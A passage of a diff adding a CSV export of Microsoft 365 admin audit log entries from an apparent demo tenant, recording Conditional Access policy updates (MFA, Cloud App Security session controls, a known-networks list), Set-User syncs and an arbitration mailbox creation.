+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:45Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:44 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:44Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:44 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:43Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:43 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:43Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:42 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:46Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:44Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:44 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:46Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-12T04:48:45Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:44Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:43 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T03:27:21Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-12T09:06:31Z,NT AUTHORITY\SYSTEM (w3wp),[2603:1036:302:4091::5]:51902,New-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartition"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OrgPartitionDescription"",
+    ""Value"": ""Tenant Wide Lexicon Data Org Partition""
+  },
+  {
+    ""Name"": ""OrgPartitionOwner"",
+    ""Value"": ""66a88757-258c-4c72-893c-3e8bed4d6899""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""SN6PR06A07DC001.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-05-12T19:03:29Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-12T20:30:16Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-12T20:17:18Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-13T01:19:14Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-13T05:29:27Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-13T02:33:16Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-22T10:58:25Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T10:58:25Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T11:19:58Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\9ed32e1a-a8db-462d-be28-db5ef104ea23""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-07T13:58:50Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-08T02:45:08Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-08T03:12:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 3:12:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T03:12:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 3:12:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T03:12:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 3:12:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T03:12:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 3:12:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T03:12:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 3:12:51 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
